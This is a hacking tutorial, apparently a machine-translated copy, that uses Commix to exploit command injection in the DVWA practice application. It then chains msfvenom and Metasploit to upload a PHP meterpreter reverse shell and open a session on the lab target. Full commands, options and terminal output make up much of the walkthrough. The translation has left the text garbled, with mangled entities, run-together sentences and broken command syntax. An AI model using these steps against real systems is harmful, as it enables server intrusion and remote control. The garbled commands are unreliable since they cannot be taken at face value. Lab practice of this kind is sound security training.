The ability to execute system commands through a vulnerable Web application makes command injection a fertile attack vector for any hacker. Although these types of vulnerabilities are highly appreciated, it can often take a while to search an entire application to find those errors. Fortunately, there is a useful tool called Commix that can automate this process for us.
What Is Commix
Commix, a portmanteau of Command Injection Exploiter, is an open-source tool used to test web-based application injection-based vulnerabilities and errors. It is automated which makes it very easy to identify vulnerable parameters in a fraction of the time required for manual execution.
Commix is written in Python, which means that it can run on Linux, Mac and Windows. In addition, it is also included in the official repositories of Kali Linux, BlackArch and Parrot Security OS. Everything works immediately and there is even support for custom module development to extend the core functionality of this tool.
A variety of options are available, including the ability to specify connection parameters to the host, target enumeration, file access and modification, and even an offline mode. All of these features make Commix a very useful tool when trying to exploit command injection.
In this tutorial we will use Commix and later msfvenom and Metasploit to exploit command injection errors in DVWA.
Method 1: Basic Usage
First open DVWA and sign in with the default credentials.
Next, navigate to DVWA Security and set the security level to low to ensure that this web application is exploited everything works smoothly.
Now, go to the Command Execution tab, which is of interest to Commix
You need the cookie that contains the session ID and security level for this tool to run successfully, use the Inspect Element tool in your browser to display the request, click " Network "and then" Raw headers "to view the information demonstrate.
Use: Commix [option(s)]
options:
-h, –help Show help and exit.
General:
These options are for general affairs.
-v VERBOSE verbosity level (0-4, default: 0).
–version Display and exit version number.
–output-dir = OUT .. Sets the path of the custom output directory.
-s SESSION_FILE Loads a session from a saved file (.sqlite).
–flush-session Deletes the session files for the current destination.
–ignore-session Ignore results stored in the session file.
-t TRAFFIC_FILE Logs all HTTP traffic in a text file.
–batch Never ask for user input, use the default behavior.
–encoding = ENCOD .. Force character encoding used to retrieve data (eg.
GBK).
–charset = CHARSET Time-related injection character set (eg
"0123456789abcdef")
–check-internet Check the internet connection before you rate the destination.
Aim:
This option must be specified to define the destination URL.
-u URL, –url = URL destination URL.
–url-reload Reloads the destination URL after command execution.
-l LOGFILE Parses the destination from the HTTP proxy log file.
-m BULKFILE Scans multiple targets specified in a text file.
-r REQUESTFILE Downloads the HTTP request from a file.
–crawl = CRAWLDEPTH Search the site from the destination URL (1-2,
Default: 0).
-x SITEMAP_URL Parse target (s) from a remote Sitemap file (.xml).
Request:
These options can be used to specify how to connect to the destination URL.
-d DATA, –data = .. data string to be sent by POST.
–host = HOST HTTP host header.
–referer = REFERER-HTTP-Referer-Header.
–user-agent = AGENT HTTP user agent header.
–random-agent Uses a randomly selected HTTP user-agent header.
–param-del = PDEL Sets the character for the distribution of parameter values.
–cookie = COOKIE HTTP cookie header.
–cookie-del = CDEL Sets a character to split cookie values.
-H HEADER, –hea .. Additional Header (for example, & x39; Forwarded-For: 127.0.0.1 & # 39;).
–headers = HEADERS Additional headers (for example, & Accept-Language: fr nday: 123 & # 39;).
–proxy = PROXY Use an HTTP proxy (for example, & # 39; 127.0.0.1: 8080 & # 39;).
–tor Use the Tor network.
–tor-port = TOR_P .. Set the port proxy port (default: 8118).
–tor-check Check if Tor is being used properly.
–auth-url = AUTH_ .. URL of the login area.
–auth-data = AUTH .. login parameters and data.
–auth-type = AUTH .. HTTP authentication type (e.g., & # 39; Basic & # 39; or & # 39; Digest & # 39;).
–auth-cred = AUTH .. HTTP authentication credentials (for example, & # 39; admin: admin & # 39;).
–ignore-401 Ignore HTTP error 401 (unauthorized).
–force-ssl Forces the use of SSL / HTTPS.
–ignore-redirects ignore redirection attempts.
–retries = RETRIES Repeats the connection when the connection expires (default: 3).
…
We will use the following options:
- The -u flag defines the destination URL.
- The cookie = option sets the appropriate cookie information.
- Option – data = to specify the POST request string.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie = & # 39; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit & # 39; The tool launches and displays a banner with some version information, followed by some on-screen messages showing the current status. We can see that a parameter is found that is vulnerable to the command input and asks us if we want a pseudo-terminal shell.
/ `___ / __` / & # 39; __` __` / & # 39; __` __` / \ & # 39; v2.6-stable
/ __ // L \\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\ \ introduces us to an interactive command shell. We can now issue commands such as whoami and uname -a to display information about the server. Pseudo-Terminal (Type?? For available options)
commix (os_shell)> whoami
WWW data
commix (os_shell)> uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
This is indeed useful, but we can only vaguely imagine. Fortunately, there is a way to combine the functionality of Commix with the powerful msfvenom to ultimately get a meter-meter session on the target.
Method 2: Upload Reverse Shell
Commix has a feature that allows us to write files to the system target system. We'll put a reverse shell on the target that calls our attack engine, but before we do that, we'll have to build the payload.
Msfvenom is a payload generator that replaces both msfpayload and msfencode back 2015. This single tool can be used to create payloads outside the Metasploit framework.
Use the command msfvenom with the following options.
- The -p Flag indicating the payload.
- Use lhost to specify the address of the Listening Host.
- Use lport to set the listening port.
- -D flag for specifying the encoder.
- The -f flag for specifying the output format.
Make sure you type > to write to the file . payload.php .
root @ drd: ~ # msfvenom -p php / meterpreter / reverse_tcp lhost = 172.16.1.100 lport = 4321 -e php / base64 -f raw> payload.php
[-] No platform was selected, with Msf :: Module :: Platform :: PHP selected from the payload
[-] No arc selected, with the payload arch: php selected
1 compatible encoder was found
Attempt to encode the payload with 1 iteration of PHP / Base64
php / base64 succeeded with size 1507 (iteration = 0)
php / base64 with final size 1507 selected
Payload size: 1507 bytes
The payload was created successfully. Now all we have to do is put the PHP tags in our file. Enter nano payload.php and add <? Add php at the beginning of the file and [> at the end of the file. Press Ctrl-X Y and Enter to save.
Now we have to open a handler on our machine to intercept the session that is opened on the target. Start Metasploit in a new terminal window by typing msfconsole . After loading enter with Exploit / Multi / Handler the general purpose handler.
Next, set the payload, listening address, and port that we specified earlier in our file.
msf exploit (multi / handler)> Payload PHP / meterpreter / reverse_tcp set
Payload => php / meterpreter / reverse_tcp
msf exploit (multi / handler)> set host 172.16.1.100
lhost => 172.16.1.100
Set msf exploit (multi / handler)> port 4321
lport => 4321
Once these are set, start the handler by typing run an exploit alias.
msf exploit (multi / handler)> run
[*] Reverse TCP handler was started at 172.16.1.100:4321[19659018Backinourotherterminalweareabletopre-commitsomeadditionaloptionstobringourpayloadtothetarget[1969090] The - file-write Option to specify the file to use on our local computer. The option - file-dest to set the destination on the target. Option - os-cmd to specify the command to execute when the file is written to the destination. commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ - -cookie = & # 39; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit & # 39; - file-write = & # 39; / root / payload.php & # 39; - file-dest = & # 39; / var / www / payload.php - os-cmd = & # 39; php -f /var/www/payload.php'[19659018ThisallowsourpayloadtobeexecutedonasessionfromourhandlerifitworksproperlyCommixwillnotrunforawhileandfinallywecanfindthatourfilehasbeensuccessfullycreatedonthetarget ...
[*] Testing the (result-based) classical instruction injection technique ... [ SUCCEED ]
[+] The POST parameter & # 39; ip & # 39; seems to be injectable via the (result-based) classical instruction injection technique.
[~] Payload: Echo YJOSPV $ ((42 + 12)) $ (Echo YJOSPV) YJOSPV
[+] The file /var/www/payload.php was created successfully!
Now you can see in the other terminal that a meterpreter session has actually been opened. We can now execute commands such as getuid and sysinfo to display information about the destination.
[*] Send Stage (37775 bytes) to 172.16.1.102
[*] Meterpreter Session 1 has been opened at 2018-10-18 11:29:19 -0500 (172.16.1.100:4321 -> 172.16.1.102:40115)
meterpreter> getuid
Server username: www-data (33)
meterpreter> sysinfo
Computer: metasploitable
OS: Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter: php / linux
These are similar results as before by using Commix alone, but now that we have a Meterpreter session, there is much more flexibility than we can ultimately do.
Conclusion [19659003] Hackers attack command injection vulnerabilities due to the potential power they exert over the target system. Commix is a very useful tool that automates the process of finding and exploiting these vulnerabilities and making life a little easier for the hacker.
In this guide, we learned about some basic usage options. We also saw how you combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent addition to any hacker arsenal.
Don & # 39; t Miss: Use Metasploit's Web Delivery Script & Command Injection to invoke a shell
Title image by Jarmoluk / Pixabay; Screenshots of drd_ / zero byte
Source link
